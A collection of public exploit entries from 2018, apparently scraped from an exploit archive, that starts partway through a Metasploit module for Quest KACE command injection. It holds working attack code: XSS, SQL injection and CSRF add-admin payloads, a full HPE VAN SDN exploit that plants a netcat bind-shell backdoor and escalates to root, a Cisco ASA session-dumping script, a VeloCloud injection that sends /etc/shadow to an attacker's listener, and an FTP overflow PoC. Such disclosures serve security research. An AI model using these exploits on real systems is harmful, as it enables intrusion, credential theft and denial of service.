return CheckCode::Safe
end
unless res.headers['X-KACE-Version'] =~ /\A([0-9]+)\.([0-9]+)\.([0-9]+)\z/
vprint_error 'Could not determine KACE appliance version'
return CheckCode::Detected
end
version = Gem::Version.new res.headers['X-KACE-Version'].to_s
vprint_status "Found KACE appliance version #{version}"
# Patched versions : https://support.quest.com/product-notification/noti-00000134
if version < Gem::Version.new('7.0') ||
(version >= Gem::Version.new('7.0') && version < Gem::Version.new('7.0.121307')) ||
(version >= Gem::Version.new('7.1') && version < Gem::Version.new('7.1.150')) ||
(version >= Gem::Version.new('7.2') && version < Gem::Version.new('7.2.103')) ||
(version >= Gem::Version.new('8.0') && version < Gem::Version.new('8.0.320')) ||
(version >= Gem::Version.new('8.1') && version < Gem::Version.new('8.1.108'))
return CheckCode::Appears
end
CheckCode::Safe
end
def serial_number
return datastore['SERIAL'] unless datastore['SERIAL'].to_s.eql? ''
res = send_request_cgi('uri' => normalize_uri('common', 'about.php'))
return unless res
res.body.scan(/Serial Number: ([A-F0-9]+)/).flatten.first
end
def exploit
check_code = check
unless [CheckCode::Appears, CheckCode::Detected].include? check_code
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
serial = serial_number
if serial.to_s.eql? ''
print_error 'Could not retrieve appliance serial number. Try specifying a SERIAL.'
return
end
vprint_status "Using serial number: #{serial}"
print_status "Sending payload (#{payload.encoded.length} bytes)"
vars_get = Hash[{
'platform' => 'windows',
'serv' => Digest::SHA256.hexdigest(serial),
'orgid' => "#{datastore['ORGANIZATION']}#; #{payload.encoded} ",
'version' => datastore['AGENT_VERSION']
}.to_a.shuffle]
res = send_request_cgi({
'uri' => normalize_uri('common', 'download_agent_installer.php'),
'vars_get' => vars_get
}, 10)
unless res
fail_with Failure::Unreachable, 'Connection failed'
end
unless res.headers.to_s.include?('KACE') || res.headers.to_s.include?('KBOX')
fail_with Failure::UnexpectedReply, 'Unexpected reply'
end
case res.code
when 200
print_good 'Payload executed successfully'
when 404
fail_with Failure::BadConfig, 'The specified AGENT_VERSION is not valid for the specified ORGANIZATION'
when 302
if res.headers['location'].include? 'error.php'
fail_with Failure::UnexpectedReply, 'Server encountered an error'
end
fail_with Failure::BadConfig, 'The specified SERIAL is incorrect'
else
print_error 'Unexpected reply'
end
register_dir_for_cleanup "/tmp/agentprov/#{datastore['ORGANIZATION']}#;/"
end
end
# Exploit Title: DIGISOL DG-HR3400 Wireless Router - Cross-Site Scripting
# Date: 2018-06-25
# Vendor Homepage: http://www.digisol.com
# Hardware Link: https://www.amazon.in/Digisol-DG-HR3400-300Mbps-Wireless-Broadband/dp/B00IL8DR6W
# Category: Hardware
# Exploit Author: Adipta Basu
# Tested on: Mac OS High Sierra
# CVE: N/A
# Reproduction Steps:
- Goto your Wifi Router Gateway [i.e: http://192.168.2.1]
- Go to --> "General Setup" --> "Wireless" --> "Basic Settings"
- Open BurpSuite
- Change the SSID to "Testing" and hit "Apply"
- Burp will capture the intercepts.
- Now change the SSID to <script>alert("ADIPTA")</script> and keep APSSID as it is
- Refresh the page, and you will get the "ADIPTA" pop-up
# Exploit Title: hycus Content Management System v1.0.4 Login Page Bypass
# Google Dork:N/A
# Date: 28.06.2018
# Exploit Author: Berk Dusunur
# Vendor Homepage: http://www.hycus.com/
# Software Link: http://demosite.center/hycus/
# Version: 1.0.4
# Tested on: Pardus / Debian Web Server
# CVE : N/A
#Proof Of Concept
use login bypass payload for username= '=' 'OR' for password= '=' 'OR'
# Exploit Title: HongCMS 3.0.0 - SQL Injection
# Google Dork: [if applicable]
# Date: 2018/06/26
# Exploit Author: Hzllaga
# Vendor Homepage: https://github.com/Neeke/HongCMS/
# Software Link: https://github.com/Neeke/HongCMS/
# Version: 3.0.0
# Tested on: php5.4 mysql5
# CVE : CVE-2018-12912
POC (Administrator Privilege):
/admin/index.php/database/operate?dbaction=emptytable&tablename=hong_vvc%60%20where%20vvcid%3D1%20or%20updatexml%282%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20or%20%60
# Exploit Title: A CSRF vulnerability exists in BEESCMS_V4.0: The administrator can be added arbitrarily.
# Date: 2018-06-25
# Exploit Author: bay0net
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9226389.html
# Software Link: http://www.beescms.com/
# Version: BEESCMS - V4.0
# CVE : CVE-2018-12739
A CSRF vulnerability exists in BEESCMS_V4.0: The administrator can be added arbitrarily.
The payload for attack is as follows.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://10.211.55.17/beescms/admin/admin_admin.php?nav=list_admin_user&admin_p_nav=user" method="POST" enctype="multipart/form-data">
<input type="hidden" name="admin_name" value="test1" />
<input type="hidden" name="admin_password" value="test1" />
<input type="hidden" name="admin_password2" value="test1" />
<input type="hidden" name="admin_nich" value="test1" />
<input type="hidden" name="purview" value="1" />
<input type="hidden" name="admin_admin" value="" />
<input type="hidden" name="admin_mail" value="" />
<input type="hidden" name="admin_tel" value="" />
<input type="hidden" name="is_disable" value="0" />
<input type="hidden" name="action" value="save_admin" />
<input type="hidden" name="submit" value="确定" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
'''
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
KL-001-2018-008 : HPE VAN SDN Unauthenticated Remote Root Vulnerability
Title: HPE VAN SDN Unauthenticated Remote Root Vulnerability
Advisory ID: KL-001-2018-008
Publication Date: 2018.06.25
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2018-008.txt
1. Vulnerability Details
Affected Vendor: HP Enterprise
Affected Product: VAN SDN Controller
Affected Version: 2.7.18.0503
Platform: Embedded Linux
CWE Classification: CWE-798: Use of Hard-coded Credentials,
CWE-20: Improper Input Validation
Impact: Privilege Escalation
Attack vector: HTTP
2. Vulnerability Description
A hardcoded service token can be used to bypass
authentication. Built-in functionality can be exploited
to deploy and execute a malicious deb file containing a
backdoor. A weak sudoers configuration can then be abused to
escalate privileges to root. A second issue can be used to
deny use of the appliance by continually rebooting it.
3. Technical Description
The exploit will automatically attempt to bypass authentication
unless the --no-auth-bypass flag is provided. If that flag is
provided, the --username and --password flags must also be given.
The options for the --payload flag are: rce-root and
pulse-reboot. The default option is rce-root. The pulse-reboot
payload will reboot the target device until the attack is stopped.
$ python hpevansdn-multiple_exploits.py --help
HPE VAN SDN Controller 2.7.18.0503
Unauthenticated Remote Root and Denial-of-Service
Usage: hpevansdn-multiple_exploits.py [options]
Options:
-h, --help show this help message and exit
--target=REMOTE_IP Target IP address
--no-auth-bypass No authentication bypass
--username=USERNAME Username (Default: sdn)
--password=PASSWORD Password (Default: skyline)
--payload=PAYLOAD Payload: rce-root(default), pulse-reboot
Below is output for the rce-root payload:
$ python hpevansdn-multiple_exploits.py --target 1.3.3.7
HPE VAN SDN Controller 2.7.18.0503
Unauthenticated Remote Root and Denial-of-Service
[+] Authentication successfully bypassed.
[-] Starting remote root exploit.
[-] Building backdoor.
[-] Uploading backdoor.
[+] Upload successful.
[-] Installing backdoor.
[+] Starting backdoor on port 49370.
[+] Connected to backdoor.
* For interactive root shell please run /var/lib/sdn/uploads/root-V6mlQNqW
id
uid=108(sdnadmin) gid=1000(sdn) groups=1000(sdn)
/var/lib/sdn/uploads/root-V6mlQNqW
root@medium-hLinux:/opt/sdn/admin# uname -a
Linux medium-hLinux 4.4.0-2-amd64-hlinux #hlinux1 SMP Thu Jan 28 12:35:26 UTC 2016 x86_64 GNU/Linux
root@medium-hLinux:/opt/sdn/admin# exit
[-] Removing backdoor.
[+] Backdoor removed.
4. Mitigation and Remediation Recommendation
The vendor issued the following statement:
HPE had evaluated the impact of service token being
leaked and previously updated the security procedure in
VAN 2.8.8 Admin Guide page 129. The full guide is here -
http://h20628.www2.hp.com/km-ext/kmcsdirect/emr_na-a00003662en_us-1.pdf.
HPE expects all customers to update their service token,
admin token, default sdn user password, and edit iptables as
described in the guideline. If the guideline was followed,
the exploit would not be successful.
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.
6. Disclosure Timeline
2018.02.16 - KoreLogic submits vulnerability details to HPE.
2018.02.16 - HPE acknowledges receipt.
2018.04.02 - 30 business days have elapsed since the vulnerability
was reported to HPE.
2018.04.23 - 45 business days have elapsed since the vulnerability
was reported to HPE.
2018.05.04 - KoreLogic requests an update on the status of the
remediation.
2018.05.14 - 60 business days have elapsed since the vulnerability
was reported to HPE.
2018.06.05 - 75 business days have elapsed since the vulnerability
was reported to HPE.
2018.06.11 - KoreLogic requests an update on the status of the
remediation.
2018.06.12 - HPE responds with the statement documented in Section
4. Mitigation and Remediation Recommendation.
2018.06.25 - KoreLogic public disclosure.
7. Proof of Concept
'''
from optparse import OptionParser
from random import randrange,choice
from threading import Thread
from os import mkdir,makedirs,system,listdir,remove
from string import ascii_letters,digits
from subprocess import check_output
from requests import get,post
from requests.utils import dict_from_cookiejar
from requests.exceptions import ConnectionError
from time import sleep
from sys import exit
from json import dumps
#################################
# PULSE REBOOT TIMER IN SECONDS #
pulse_timer = 60 #
#################################
banner = """HPE VAN SDN Controller 2.7.18.0503
Unauthenticated Remote Root and Denial-of-Service
""".center(80)
class Backdoor:
def __init__(self):
######################################################################################
# ATTACK SHELL SCRIPT #
self.backdoor_port = randrange(50000,55000) #
self.backdoor_script = """#!/bin/sh\nnc -l -p PORT -e /bin/bash &""" # DONT CHANGE #
self.backdoor_dir = '%s-1.0.0' % ''.join( #
[choice(digits + ascii_letters) for i in xrange(8)] #
) #
self.backdoor_script = self.backdoor_script.replace('PORT',str(self.backdoor_port)) #
######################################################################################
self.cmd_name = ''.join([choice(digits + ascii_letters) for i in xrange(8)])
return None
def generate(self):
print '[-] Building backdoor.'
control_template = """Source: %s
Section: misc
Priority: extra
Maintainer: None
Homepage: http://127.0.0.1/
Version: 1.0.0
Package: %s
Architecture: all
Depends:
Description: %s
""" % (self.backdoor_dir,self.cmd_name,self.backdoor_dir)
try:
mkdir(self.backdoor_dir)
mkdir('%s/%s' % (self.backdoor_dir,'DEBIAN'))
fp = open('%s/%s/control' % (self.backdoor_dir,'DEBIAN'),'w')
fp.write(control_template)
fp.close()
makedirs('%s/var/lib/sdn/uploads/tmp' % (self.backdoor_dir))
fp = open('%s/var/lib/sdn/uploads/tmp/%s' % (self.backdoor_dir,self.cmd_name),'w')
fp.write(self.backdoor_script)
fp.close()
fp = open('%s/var/lib/sdn/uploads/root-%s' % (self.backdoor_dir,self.cmd_name),'w')
fp.write("""#!/bin/sh\nsudo -u sdn /usr/bin/sudo python -c 'import pty;pty.spawn("/bin/bash")'""")
fp.close()
system('chmod a+x %s/var/lib/sdn/uploads/tmp/%s' % (self.backdoor_dir,self.cmd_name))
system('chmod a+x %s/var/lib/sdn/uploads/root-%s' % (self.backdoor_dir,self.cmd_name))
if "dpkg-deb: building package" not in check_output(
['/usr/bin/dpkg-deb', '--build', '%s/' % (self.backdoor_dir)]
):
print '[!] Could not build attack deb file. Reason: DPKG failure.'
except Exception as e:
print '[!] Could not build attack deb file. Reason: %s.' % (e)
return '%s.deb' % self.backdoor_dir,self.cmd_name,self.backdoor_port
class HTTP:
def __init__(self):
return None
def is_service_token_enabled(self):
url = 'https://%s:8443/sdn/ui/app/rs/hpws/config' % (self.target)
try:
r = get(url, headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent}, verify=False, allow_redirects=False)
if r.status_code == 200:
return True
except ConnectionError:
print '[!] Connection to target service failed.'
exit(1)
return False
def get_session_token(self):
url = 'https://%s:8443/sdn/ui/app/login' % (self.target)
try:
r = post(url, headers={"User-Agent":self.user_agent},verify=False, data="username=%s&password=%s" % (self.username,self.password), allow_redirects=False)
if r.status_code == 303:
self.session_token = dict_from_cookiejar(r.cookies)['X-Auth-Token']
return True
except ConnectionError:
print '[!] Connection to target service failed.'
exit(1)
return False
def upload_deb(self):
print '[-] Uploading backdoor.'
url = 'https://%s:8081/upload' % (self.target)
try:
fp = open('%s' % (self.deb_name),'rb')
data = fp.read()
fp.close()
try:
r = post(url,headers={"X-Auth-Token":self.session_token,"Filename":self.deb_name,"User-Agent":self.user_agent},verify=False,data=data)
if r.status_code == 200:
print '[+] Upload successful.'
return True
else:
print '[!] Upload failed. Please try again.'
except ConnectionError:
print '[!] Connection to target service failed.'
exit(1)
except Exception as e:
print '[!] Failed to write backdoor to disk. Reason: %s.' % (e)
return False
def install_deb(self):
print '[-] Installing backdoor.'
url = 'https://%s:8081/' % (self.target)
post_body = dumps({"action":"install","name":self.deb_name})
try:
r = post(url,headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent},verify=False,data=post_body)
if r.status_code == 200:
return True
except ConnectionError:
print '[!] Connection to target service failed.'
exit(1)
return False
def start_shell(self):
print '[+] Starting backdoor on port %d.' % (self.backdoor_port)
url = 'https://%s:8081/' % (self.target)
post_body = dumps({"action":"exec","name":self.cmd_name})
try:
r = post(url,headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent},verify=False,data=post_body)
if r.status_code == 200:
return True
except ConnectionError:
print '[!] Connection to target service failed.'
exit(1)
return False
def uninstall_deb(self):
print '[-] Removing backdoor.'
url = 'https://%s:8081/' % (self.target)
post_body = dumps({"action":"uninstall","name":self.deb_name})
try:
r = post(url,headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent},verify=False,data=post_body)
if r.status_code == 200:
return True
except ConnectionError:
print '[!] Connection to target service failed.'
exit(1)
return False
def send_reboot(self):
print '[+] Sending reboot.'
url = 'https://%s:8081/' % (self.target)
post_body = dumps({"action":"reboot"})
try:
r = post(url,headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent},verify=False,data=post_body)
except ConnectionError:
print '[!] Connection to target service failed.'
exit(1)
return False
class Exploit(HTTP):
def __init__(self,target=None,noauthbypass=None,
username=None,password=None,payload=None):
self.target = target
self.noauthbypass = noauthbypass
self.username = username
self.password = password
self.payload = payload
self.deb_name = ''
self.cmd_name = ''
self.backdoor_port = 0
self.session_token = 'AuroraSdnToken37'
self.user_agent = choice(['Mozilla/5.0 (X11; U; Linux x86_64; en-ca) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; it-it) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; SV1; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Ubuntu/10.10 Chromium/8.0.552.237 Chrome/8.0.552.237 Safari/534.10'])
return None
def drop_root(self):
sleep(3)
print '[+] Connected to backdoor.\n\t* For interactive root shell please run /var/lib/sdn/uploads/root-%s' % (self.cmd_name)
system('nc %s %s' % (self.target,self.backdoor_port))
return False
def run(self):
if not self.is_service_token_enabled() or self.noauthbypass == True:
print '[-] Authentication bypass failed or running with --no-auth-bypass. Attempting login.'
if not self.get_session_token():
print '[!] Login failed. Exploit failed.'
exit(1)
else:
print '[+] Authentication successfully bypassed.'
if self.payload == 'rce-root':
print '[-] Starting remote root exploit.'
self.deb_name, self.cmd_name, self.backdoor_port = Backdoor().generate()
if self.upload_deb():
if self.install_deb():
Thread(target=self.start_shell,args=(),name="shell-%s" % (self.cmd_name)).start()
try:
self.drop_root()
except KeyboardInterrupt:
print '[-] Disconnecting from backdoor.'
return True
if self.uninstall_deb():
print '[+] Backdoor removed.'
else:
print '[!] Could not remove backdoor.'
return True
else:
print '[!] Failed to install backdoor.'
exit(1)
else:
print '[!] Failed to upload backdoor.'
exit(1)
print "[-] Please remember to srm %s and the build directory %s/" % (self.deb_name,self.deb_name.replace('.deb',''))
else:
print '[-] Starting pulse reboot exploit.'
while True:
try:
self.send_reboot()
sleep(pulse_timer)
except KeyboardInterrupt:
print '[-] Reboot pulse Denial-of-Service stopped.'
break
return False
if __name__=="__main__":
print banner
parser = OptionParser()
parser.add_option("--target",dest="remote_ip",default='',help="Target IP address")
parser.add_option("--no-auth-bypass",action="store_true",default=False,help="No authentication bypass")
parser.add_option("--username",dest="username",default="sdn",help="Username (Default: sdn)")
parser.add_option("--password",dest="password",default="skyline",help="Password (Default: skyline)")
parser.add_option("--payload",dest="payload",default='rce-root',help="Payload: rce-root(default), pulse-reboot")
o, a = parser.parse_args()
if o.remote_ip != '':
Exploit(target=o.remote_ip,
noauthbypass=o.no_auth_bypass,
username=o.username,
password=o.password,
payload=o.payload).run()
else:
print '[!] --target must be supplied.'
'''
The contents of this advisory are copyright(c) 2018
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt
-----BEGIN PGP SIGNATURE-----
iQJOBAEBCAA4FiEETtzSIGy8wE6Vn0geUk0uR1lFz/MFAlsxL1caHGRpc2Nsb3N1
cmVzQGtvcmVsb2dpYy5jb20ACgkQUk0uR1lFz/OLgA/+I4R5zIz93rYS6VZBbMcD
6fQYup7o9yGkjSOyhTYMWJYL1BXMJHz534OUX54/vkvhoxdkhb4ouGIYneB+lXCb
WcPHGAkk094K50z9e3OXcsw3hDNS2lfQVS9IaHxR7iae4zRk6DQQYCBYgfPhi3+5
x9SkBV516WPM3iyu4Bgx19FTBcx3yXLRruGAftrceIiVdlUDrQbuu3Sht0oa3VBh
36mGDld7NS+vFHFJwTxbkBwodKViwDTzsYtnh0JId5ICp2a3PAR75Rwnbr+zt8SW
byD5CgA9szpSf7Sa6H8NnhGSKC47zXQ0K4uZsEJtkHqySjq0jvw1RngnIdJWnTFz
E6cEL7evsySeMKOoO1q8A0DpUigVFan3dxdaAE7uT9z2pN1RmRJglR8RiQo/L6ML
rKFhePlfsuqJon+Ux/R5XhKgT3oQbGwz/yaV1jSUujO+qqs0yI/pEIzhkj35Ovai
k9SiNQgIm8BvrIyA2nUI1xn32Pk2PFqh77gti5HVS3JExHsMPm5c3ZjKhw3/dS3d
wXeoeL7Vh+z2I0q9E2GzLSUqxh/vsYdlbcPprgH7GGsVElEhBprsw0AmNk7lh4e4
OwKI54tp0wbRewszQp8p9bbehwD+b4uFhqpD54w48yq3Ntv3/B07OprKWjEQUQC2
GKUgtPVRc8ZwJV+2c+MYICU=
=mzf4
-----END PGP SIGNATURE-----
'''
'''
Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)
A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques.
Vulnerable Products
This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products:
3000 Series Industrial Security Appliance (ISA)
ASA 1000V Cloud Firewall
ASA 5500 Series Adaptive Security Appliances
ASA 5500-X Series Next-Generation Firewalls
ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
Adaptive Security Virtual Appliance (ASAv)
Firepower 2100 Series Security Appliance
Firepower 4100 Series Security Appliance
Firepower 9300 ASA Security Module
FTD Virtual (FTDv)
Script usage
Installation: git clone https://github.com/yassineaboukir/CVE-2018-0296.git
Usage: python cisco_asa.py <URL>
If the web server is vulnerable, the script will dump in a text file both the content of the current directory, files in +CSCOE+ and active sessions.
Disclaimer: please note that due to the nature of the vulnerability disclosed to Cisco, this exploit could result in a DoS so test at your own risk.
Bug Bounty Recon
You can use Shodan, Censys or any other OSINT tools to enumerate vulnerable servers or simply google dork /+CSCOE+/logon.html. Figure it out :)
References:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180606-asaftd
'''
#!/usr/bin/env python
import requests
import sys
import urlparse
import os
import re
print("""
_____ _____ _____ _____ _____ ___ _____ ___
/ __ \_ _/ ___/ __ \ _ | / _ \ / ___|/ _ \
| / \/ | | \ `--.| / \/ | | | / /_\ \\ `--./ /_\ \
| | | | `--. \ | | | | | | _ | `--. \ _ |
| \__/\_| |_/\__/ / \__/\ \_/ / | | | |/\__/ / | | |
\____/\___/\____/ \____/\___/ \_| |_/\____/\_| |_/
______ _ _ _____ _
| ___ \ | | | | |_ _| | |
| |_/ /_ _| |_| |__ | |_ __ __ ___ _____ _ __ ___ __ _| |
| __/ _` | __| '_ \ | | '__/ _` \ \ / / _ \ '__/ __|/ _` | |
| | | (_| | |_| | | | | | | | (_| |\ V / __/ | \__ \ (_| | |
\_| \__,_|\__|_| |_| \_/_| \__,_| \_/ \___|_| |___/\__,_|_|
CVE-2018-0296
Script author: Yassine Aboukir(@yassineaboukir)
""")
requests.packages.urllib3.disable_warnings()
url = sys.argv[1]
regexSess = r"([0-9])\w+'"
regexUser = r"(user:)\w+"
dir_path = os.path.dirname(os.path.realpath(__file__))
filelist_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/"
CSCOE_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b"
active_sessions = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"
logon = "/+CSCOE+/logon.html"
try:
is_cisco_asa = requests.get(urlparse.urljoin(url,logon), verify=False, allow_redirects=False)
except requests.exceptions.RequestException as e:
print(e)
sys.exit(1)
if "webvpnLang" in is_cisco_asa.cookies:
try:
filelist_r = requests.get(urlparse.urljoin(url,filelist_dir), verify=False)
CSCOE_r = requests.get(urlparse.urljoin(url,CSCOE_dir), verify=False)
active_sessions_r = requests.get(urlparse.urljoin(url,active_sessions), verify=False)
except requests.exceptions.RequestException as e:
print(e)
sys.exit(1)
if str(filelist_r.status_code) == "200":
with open(urlparse.urlparse(url).hostname+".txt", "w") as cisco_dump:
cisco_dump.write("======= Directory Index =========\n {}\n ======== +CSCEO+ Directory ========\n {}\n ======= Active sessions =========\n {}\n ======= Active Users =========\n".format(filelist_r.text, CSCOE_r.text, active_sessions_r.text))
''' Extraccion de usuarios'''
matches_sess = re.finditer(regexSess, active_sessions_r.text)
for match_sess in matches_sess:
active_users_r = requests.get(urlparse.urljoin(url,"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"+str(match_sess.group().strip("'"))), verify=False)
matches_user = re.finditer(regexUser, active_users_r.text)
for match_user in matches_user:
cisco_dump.write(match_user.group()+"\n")
''' Fin Extraccion de usuarios'''
print("Vulnerable! Check the text dump saved in {}".format(dir_path))
else: print("Not vulnerable!")
else:
print("This is not Cisco ASA! e.g: https://vpn.example.com/+CSCOE+/logon.html\n")
sys.exit(1)
<!--
# Exploit Title: DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)
# Date: 2018-06-30
# Exploit Author: bay0net
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9248562.html
# Software Link: https://www.damicms.com/Down#
# Version: DAMICMS_V6.0.0
# CVE : N/A
# DamiCMS v6.0.0 allows CSRF via admin.php?s=/Admin/doadd to add an administrator account.
# The payload for attack is as follows.
-->
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://Target/dami/admin.php?s=/Admin/doadd" method="POST">
<input type="hidden" name="username" value="test22" />
<input type="hidden" name="password" value="test22" />
<input type="hidden" name="role_id" value="1" />
<input type="hidden" name="Submit" value="添加" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
#!/usr/bin/env python
# Exploit Title: Unauthenticated Command Injection vulnerability in VMware NSX SD-WAN by VeloCloud
# Date: 2018-06-29
# Exploit Author: paragonsec @ Critical Start
# Credit: Brian Sullivan from Tevora and Section 8 @ Critical Start
# Vendor Homepage: https://www.vmware.com
# Security Advisory: https://www.vmware.com/security/advisories/VMSA-2018-0011.html
# Version: 3.1.1
# CVE: CVE-2018-6961
import argparse
import requests
import sys
import collections
'''
This script will return execute whatever payload you placed within it.
Keep in mind that SD-WAN is running a slimmed down Linux version so obtaining a reverse shell isn't as simple as nc -e /bin/bash blah blah
The command within this script will send stdout of commands to your netcat listener. Feel free to change :)
'''
#Colors
OKRED = '\033[91m'
OKGREEN = '\033[92m'
ENDC = '\033[0m'
parser = argparse.ArgumentParser()
parser.add_argument("--rhost", help = "Remote Host")
parser.add_argument("--source", help = "Victim WAN Interface (e.g ge1, ge2)")
parser.add_argument('--lhost', help = 'Local Host listener')
parser.add_argument('--lport', help = 'Local Port listener')
parser.add_argument('--func', help = 'Function to abuse (e.g traceroute, ping, dns)')
args = parser.parse_args()
# Check to ensure at least one argument has been passed
if len(sys.argv)==1:
parser.print_help(sys.stderr)
sys.exit(1)
rhost = args.rhost
source = args.source
lhost = args.lhost
lport = args.lport
func = args.func
# Payload to be sent to the victim. Change to whatever you like!
# This payload will cat /etc/passwd from fictim and pipe it into a netcat connection to your listener giving you the contents of /etc/passwd
payload = "$(cat /etc/shadow |nc " + lhost + " " + lport + ")"
exploit_url = "http://" + rhost + "/scripts/ajaxPortal.lua"
headers = [
('User-Agent','Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'),
('Accept', 'application/json, text/javascript, */*; q=0.01'),
('Accept-Language', 'en-US,en;q=0.5'),
('Accept-Encoding', 'gzip, deflate'),
('Referer','http://' + rhost + '/'),
('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8'),
('X-Requested-With', 'XMLHttpRequest'),
('Cookie', 'culture=en-us'),
('Connection', 'close')
]
# probably not necessary but did it anyways
headers = collections.OrderedDict(headers)
# Setting up POST body parameters
if func == 'traceroute':
body = "destination=8.8.8.8" + payload + "&source=" + source + "&test=TRACEROUTE&requestTimeout=900&auth_token=&_cmd=run_diagnostic"
elif func == 'dns':
body = "name=google.com" + payload + "&test=DNS_TEST&requestTimeout=90&auth_token=&_cmd=run_diagnostic"
else:
body = "destination=8.8.8.8" + payload + "&source=" + source + "&test=BASIC_PING&requestTimeout=90&auth_token=&_cmd=run_diagnostic"
print(OKGREEN + "Author: " + ENDC + "paragonsec @ Critical Start (https://www.criticalstart.com)")
print(OKGREEN + "Credits: " + ENDC + "Brian Sullivan @ Tevora and Section 8 team @ Critical Start")
print(OKGREEN + "CVE: " + ENDC + "2018-6961")
print(OKGREEN + "Description: " + ENDC + "Multiple Unauthenticated Command Injection Vulnerabilities in VeloCloud SD-WAN GUI Application\n")
print(OKGREEN + "[+]" + ENDC + "Running exploit...")
s = requests.Session()
req = requests.post(exploit_url, headers=headers, data=body)
if "UNKNOWN_COMMAND" not in req.text:
print(OKGREEN + "[+]" + ENDC + "Exploit worked. Check listener!")
else:
print(OKRED + "[!]" + ENDC + "Exploit failed. You lose!")
# Exploit Title: Core FTP LE 2.2 - Buffer Overflow (PoC)
# Date: 2018-06-28
# Exploit Author: Berk Cem Göksel
# Vendor Homepage: http://www.coreftp.com/
# Software Link: http://www.coreftp.com/download
# Version: Core FTP Client LE v2.2 Build 1921
# Tested on: Windows 10
# Category: Dos
# CVE : CVE-2018-12113
# coding: utf-8
# Description:]
# The vulnerability was discovered during a vulnerability research lecture.
# This is meant to be a PoC.
#!/usr/bin/env python
import socket
IP = '0.0.0.0'
port = 21
Stack_beginning = 3004
buff = "\x90" * (3004)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((IP, port))
s.listen(20)
print("[i] FTP Server started on port: "+str(port)+"\r\n")
except:
print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
while True:
conn, addr = s.accept()
conn.send('220 Welcome!' + '\r\n')
print conn.recv(1024)
conn.send('331 OK.\r\n')
print conn.recv(1024)
conn.send('230 OK.\r\n')
print conn.recv(1024)
conn.send('215 UNIX Type: L8\r\n')
print conn.recv(1024)
conn.send('257 "/" is current directory.\r\n')
print conn.recv(1024)
conn.send('227 Entering Passive Mode (' + buff + ')\r\n')
print conn.recv(1024)
conn.send('257' + '\r\n')